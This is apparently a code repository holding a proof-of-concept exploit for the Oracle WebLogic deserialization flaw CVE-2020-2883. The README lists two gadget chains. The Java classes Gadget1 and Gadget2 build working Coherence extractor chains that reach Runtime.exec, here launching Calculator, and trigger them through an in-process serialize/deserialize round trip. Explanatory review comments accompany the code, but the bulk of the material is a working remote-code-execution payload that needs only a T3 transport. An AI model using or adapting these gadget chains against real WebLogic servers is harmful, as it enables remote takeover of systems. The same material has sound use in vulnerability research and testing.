| 13 | 14 | -------------------------------------------------------------------------------- /.idea/uiDesigner.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # POC for weblogic CVE-2020-2883 2 | 3 | poc1: 4 | 5 | ```bash 6 | javax.management.BadAttributeValueExpException.readObject() 7 | com.tangosol.internal.sleepycat.persist.evolve.Mutations.toString() 8 | java.util.concurrent.ConcurrentSkipListMap$SubMap.size() 9 | java.util.concurrent.ConcurrentSkipListMap$SubMap.isBeforeEnd() 10 | java.util.concurrent.ConcurrentSkipListMap.cpr() 11 | com.tangosol.util.comparator.ExtractorComparator.compare() 12 | com.tangosol.util.extractor.ChainedExtractor.extract() 13 | com.tangosol.util.extractor.ReflectionExtractor().extract() 14 | Method.invoke() 15 | //... 
16 | com.tangosol.util.extractor.ReflectionExtractor().extract() 17 | Method.invoke() 18 | Runtime.exec() 19 | ``` 20 | 21 | poc2: 22 | 23 | ```bash 24 | java.util.PriorityQueue.readObject() 25 | java.util.PriorityQueue.heapify() 26 | java.util.PriorityQueue.siftDown() 27 | java.util.PriorityQueue.siftDownUsingComparator() 28 | com.tangosol.util.extractor.AbstractExtractor.compare() 29 | com.tangosol.util.extractor.MultiExtractor.extract() 30 | com.tangosol.util.extractor.ChainedExtractor.extract() 31 | //... 32 | Method.invoke() 33 | //... 34 | Runtime.exec() 35 | ``` 36 | 37 | ## Cautious 38 | 39 | 1. 需要导入依赖的coherence包 40 | 2. T3的请求请自行构造 41 | 42 | 43 | ## Reference 44 | 45 | https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild 46 | -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.magic 8 | weblogic_cve-2020-2883 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 13 | org.apache.maven.plugins 14 | maven-compiler-plugin 15 | 16 | 6 17 | 6 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /src/main/java/Gadget1.java: -------------------------------------------------------------------------------- 1 | import com.sleepycat.persist.evolve.Mutations; 2 | import com.tangosol.coherence.reporter.extractor.ConstantExtractor; 3 | import com.tangosol.util.ValueExtractor; 4 | import com.tangosol.util.comparator.ExtractorComparator; 5 | import com.tangosol.util.extractor.ChainedExtractor; 6 | import com.tangosol.util.extractor.ReflectionExtractor; 7 | 8 | import javax.management.BadAttributeValueExpException; 9 | import java.io.*; 10 | import java.lang.reflect.Field; 11 | import java.util.concurrent.Callable; 12 | import java.util.concurrent.ConcurrentNavigableMap; 13 | import java.util.concurrent.ConcurrentSkipListMap; 14 | 
/**
 * Deserialization gadget chain this class demonstrates. Read top-down: the
 * first line is the entry point that {@code ObjectInputStream.readObject()}
 * invokes, the last line is the sink.
 *
 * javax.management.BadAttributeValueExpException.readObject()
 * com.tangosol.internal.sleepycat.persist.evolve.Mutations.toString()
 * java.util.concurrent.ConcurrentSkipListMap$SubMap.size()
 * java.util.concurrent.ConcurrentSkipListMap$SubMap.isBeforeEnd()
 * java.util.concurrent.ConcurrentSkipListMap.cpr()
 * com.tangosol.util.comparator.ExtractorComparator.compare()
 * com.tangosol.util.extractor.ChainedExtractor.extract()
 * com.tangosol.util.extractor.ReflectionExtractor().extract()
 * Method.invoke()
 * //...
 * com.tangosol.util.extractor.ReflectionExtractor().extract()
 * Method.invoke()
 * Runtime.exec()
 *
 * NOTE(review): the listing names the shaded
 * com.tangosol.internal.sleepycat.persist.evolve.Mutations, while this file
 * imports com.sleepycat.persist.evolve.Mutations -- presumably the same class
 * under a different package in the bundled coherence jar (the README says the
 * coherence dependency has to be supplied); confirm against the jar actually
 * on the classpath.
 */

public class Gadget1 {

    /**
     * Builds the object graph described in the class comment, serializes it
     * and immediately deserializes it again in this JVM, which triggers the
     * chain locally. Despite its name the method returns nothing: the bytes
     * are consumed by {@link Deserializer#deserialize(byte[])} right away.
     *
     * @throws Exception any reflection, I/O or deserialization failure is
     *         propagated unchanged
     */
    public static void getObjectBytes() throws Exception {
        // Argument handed to Runtime.exec() at the end of the chain.
        String command = "open /System/Applications/Calculator.app";
        // Each ReflectionExtractor carries a method name plus its argument
        // array; ChainedExtractor presumably feeds every element's result into
        // the next one, so the array reads as a reflective call sequence that
        // starts from the constant Runtime.class.
        ValueExtractor[] valueExtractors = new ValueExtractor[]{
                new ConstantExtractor(Runtime.class),
                new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}),
                new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}),
                new ReflectionExtractor("exec", new Object[]{command})
        };

        ChainedExtractor chainedExtractor = new ChainedExtractor(valueExtractors);

        // The comparator's private m_extractor field is written reflectively so
        // that compare() delegates to the chain above (see the class comment).
        ExtractorComparator extractorComparator = new ExtractorComparator();
        Field m_extractor = extractorComparator.getClass().getDeclaredField("m_extractor");
        m_extractor.setAccessible(true);
        m_extractor.set(extractorComparator, chainedExtractor);

        // Same trick for ConcurrentSkipListMap.comparator: the map is created
        // without a comparator and the crafted one is swapped in afterwards.
        ConcurrentSkipListMap concurrentSkipListMap = new ConcurrentSkipListMap();
        Field comparator = concurrentSkipListMap.getClass().getDeclaredField("comparator");
        comparator.setAccessible(true);
        comparator.set(concurrentSkipListMap, extractorComparator);

        // A SubMap view over the map; per the class comment SubMap.size() and
        // isBeforeEnd() go through cpr(), i.e. through the comparator.
        ConcurrentNavigableMap subMap = concurrentSkipListMap.subMap("foo", false, "bar", false);

        // crafted Mutations Object: its private renamers field is replaced by
        // the SubMap so that Mutations.toString() ends up walking the view.
        Mutations mutations = new Mutations();
        Field renamers = mutations.getClass().getDeclaredField("renamers");
        renamers.setAccessible(true);
        renamers.set(mutations, subMap);

        // BadAttributeValueExpException.readObject() calls toString() on the
        // object held in its val field (see class comment). The field is set
        // reflectively, presumably because the public constructor does not
        // store the object as-is -- confirm against the JDK source.
        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        Field valfield = val.getClass().getDeclaredField("val");
        valfield.setAccessible(true);
        valfield.set(val, mutations);

        // Local round trip: serialize, then deserialize in-process. The
        // readObject() inside Deserializer is what fires the chain.
        Deserializer.deserialize(Serializer.serialize(val));
    }

    /**
     * Entry point; simply runs the local trigger.
     *
     * @param args ignored
     * @throws Exception propagated from {@link #getObjectBytes()}
     */
    public static void main(String[] args) throws Exception {
        getObjectBytes();
    }

    /**
     * Minimal deserialization helper.
     *
     * NOTE(review): the ObjectInputStream is deliberately unfiltered -- no
     * ObjectInputFilter, no class allow-list -- because this is the local
     * trigger for the PoC. An unfiltered readObject() on a network-facing
     * endpoint is exactly the kind of sink this CVE is about; serialization
     * filtering is the generic defence for it. The streams are not closed;
     * they are backed by an in-memory byte array, so nothing is leaked.
     */
    static class Deserializer implements Callable {
        // Serialized form consumed by call().
        private final byte[] bytes;

        public Deserializer(byte[] bytes) { this.bytes = bytes; }

        /** Deserializes the bytes given to the constructor. */
        public Object call() throws Exception {
            return deserialize(bytes);
        }

        /**
         * Deserializes a byte array.
         *
         * @param serialized the serialized stream
         * @return the root object of the stream
         * @throws IOException on a malformed stream
         * @throws ClassNotFoundException when a class in the stream is absent
         */
        public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
            final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
            return deserialize(in);
        }

        /**
         * Reads one object from the stream with a plain, unfiltered
         * ObjectInputStream; readObject() is where the gadget chain runs.
         *
         * @param in the stream to read from (not closed here)
         * @return the root object of the stream
         * @throws ClassNotFoundException when a class in the stream is absent
         * @throws IOException on a malformed stream
         */
        public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
            final ObjectInputStream objIn = new ObjectInputStream(in);
            return objIn.readObject();
        }
    }

    /**
     * Minimal serialization helper; mirrors {@link Deserializer}.
     */
    static class Serializer implements Callable {
        // Object serialized by call().
        private final Object object;
        public Serializer(Object object) {
            this.object = object;
        }

        /** Serializes the object given to the constructor. */
        public byte[] call() throws Exception {
            return serialize(object);
        }

        /**
         * Serializes an object into a byte array.
         *
         * @param obj the object graph to write
         * @return the serialized bytes
         * @throws IOException if writing fails
         */
        public static byte[] serialize(final Object obj) throws IOException {
            final ByteArrayOutputStream out = new ByteArrayOutputStream();
            serialize(obj, out);
            return out.toByteArray();
        }

        /**
         * Writes one object to the stream. The ObjectOutputStream is neither
         * flushed nor closed; this presumably relies on writeObject() draining
         * its buffer before returning -- if output ever comes out truncated,
         * flush/close objOut here first.
         *
         * @param obj the object graph to write
         * @param out the destination (not closed here)
         * @throws IOException if writing fails
         */
        public static void serialize(final Object obj, final OutputStream out) throws IOException {
            final ObjectOutputStream objOut = new ObjectOutputStream(out);
            objOut.writeObject(obj);
        }

    }

}
-------------------------------------------------------------------------------- /src/main/java/Gadget2.java: -------------------------------------------------------------------------------- 1 | import com.tangosol.coherence.reporter.extractor.ConstantExtractor; 2 | import com.tangosol.util.ValueExtractor; 3 | import com.tangosol.util.comparator.ExtractorComparator; 4 | import com.tangosol.util.extractor.ChainedExtractor; 5 | import com.tangosol.util.extractor.ReflectionExtractor; 6 | 7 | import java.io.*; 8 | import java.lang.reflect.Field; 9 | import java.util.PriorityQueue; 10 | import java.util.concurrent.Callable; 11 | 12 | /** 13 | * java.util.PriorityQueue.readObject() 14 | * java.util.PriorityQueue.heapify() 15 | * java.util.PriorityQueue.siftDown() 16 | * java.util.PriorityQueue.siftDownUsingComparator() 17 | * com.tangosol.util.extractor.AbstractExtractor.compare() 18 | * com.tangosol.util.extractor.MultiExtractor.extract() 19 | * com.tangosol.util.extractor.ChainedExtractor.extract() 20 | * //... 21 | * Method.invoke() 22 | * //... 
 * Runtime.exec()
 *
 * NOTE(review): this listing names AbstractExtractor.compare() and
 * MultiExtractor.extract(), but the code below wires an ExtractorComparator
 * around a ChainedExtractor, the same pairing Gadget1 uses -- the header may
 * describe an earlier variant; confirm which classes actually appear on the
 * stack when the chain runs.
 */

public class Gadget2 {

    /**
     * Builds a PriorityQueue whose comparator is a crafted ExtractorComparator,
     * serializes it and deserializes it again in this JVM. Per the class
     * comment, PriorityQueue.readObject() re-heapifies the queue and thereby
     * calls the comparator, which runs the extractor chain.
     *
     * @param args ignored
     * @throws Exception any reflection, I/O or deserialization failure is
     *         propagated unchanged
     */
    public static void main(String[] args) throws Exception {
        // Argument handed to Runtime.exec() at the end of the chain.
        String command = "open /System/Applications/Calculator.app";
        // Each ReflectionExtractor carries a method name plus its argument
        // array; ChainedExtractor presumably feeds every element's result into
        // the next one, starting from the constant Runtime.class.
        ValueExtractor[] valueExtractors = new ValueExtractor[]{
                new ConstantExtractor(Runtime.class),
                new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}),
                new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}),
                new ReflectionExtractor("exec", new Object[]{command})
        };

        ChainedExtractor chainedExtractor = new ChainedExtractor(valueExtractors);

        // The comparator's private m_extractor field is written reflectively so
        // that compare() delegates to the chain above.
        ExtractorComparator extractorComparator = new ExtractorComparator();
        Field m_extractor = extractorComparator.getClass().getDeclaredField("m_extractor");
        m_extractor.setAccessible(true);
        m_extractor.set(extractorComparator, chainedExtractor);

        // Two entries are added while the queue still has no comparator
        // (natural String order), presumably so that nothing runs locally
        // during add(); two elements are needed so that heapify() has a pair
        // to compare after deserialization.
        PriorityQueue priorityQueue = new PriorityQueue();
        priorityQueue.add("foo");
        priorityQueue.add("bar");

        // Only now is the crafted comparator swapped into the private field.
        Field comparator = priorityQueue.getClass().getDeclaredField("comparator");
        comparator.setAccessible(true);
        comparator.set(priorityQueue, extractorComparator);

        // Local round trip: serialize, then deserialize in-process. The
        // readObject() inside Deserializer is what fires the chain.
        Deserializer.deserialize(Serializer.serialize(priorityQueue));
    }

    /**
     * Minimal deserialization helper.
     *
     * NOTE(review): the ObjectInputStream is deliberately unfiltered -- no
     * ObjectInputFilter, no class allow-list -- because this is the local
     * trigger for the PoC. An unfiltered readObject() on a network-facing
     * endpoint is exactly the kind of sink this CVE is about; serialization
     * filtering is the generic defence for it. The streams are not closed;
     * they are backed by an in-memory byte array, so nothing is leaked.
     */
    static class Deserializer implements Callable {
        // Serialized form consumed by call().
        private final byte[] bytes;

        public Deserializer(byte[] bytes) { this.bytes = bytes; }

        /** Deserializes the bytes given to the constructor. */
        public Object call() throws Exception {
            return deserialize(bytes);
        }

        /**
         * Deserializes a byte array.
         *
         * @param serialized the serialized stream
         * @return the root object of the stream
         * @throws IOException on a malformed stream
         * @throws ClassNotFoundException when a class in the stream is absent
         */
        public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
            final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
            return deserialize(in);
        }

        /**
         * Reads one object from the stream with a plain, unfiltered
         * ObjectInputStream; readObject() is where the gadget chain runs.
         *
         * @param in the stream to read from (not closed here)
         * @return the root object of the stream
         * @throws ClassNotFoundException when a class in the stream is absent
         * @throws IOException on a malformed stream
         */
        public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
            final ObjectInputStream objIn = new ObjectInputStream(in);
            return objIn.readObject();
        }
    }

    /**
     * Minimal serialization helper; mirrors {@link Deserializer}.
     */
    static class Serializer implements Callable {
        // Object serialized by call().
        private final Object object;
        public Serializer(Object object) {
            this.object = object;
        }

        /** Serializes the object given to the constructor. */
        public byte[] call() throws Exception {
            return serialize(object);
        }

        /**
         * Serializes an object into a byte array.
         *
         * @param obj the object graph to write
         * @return the serialized bytes
         * @throws IOException if writing fails
         */
        public static byte[] serialize(final Object obj) throws IOException {
            final ByteArrayOutputStream out = new ByteArrayOutputStream();
            serialize(obj, out);
            return out.toByteArray();
        }

        /**
         * Writes one object to the stream. The ObjectOutputStream is neither
         * flushed nor closed; this presumably relies on writeObject() draining
         * its buffer before returning -- if output ever comes out truncated,
         * flush/close objOut here first.
         *
         * @param obj the object graph to write
         * @param out the destination (not closed here)
         * @throws IOException if writing fails
         */
        public static void serialize(final Object obj, final OutputStream out) throws IOException {
            final ObjectOutputStream objOut = new ObjectOutputStream(out);
            objOut.writeObject(obj);
        }

    }
}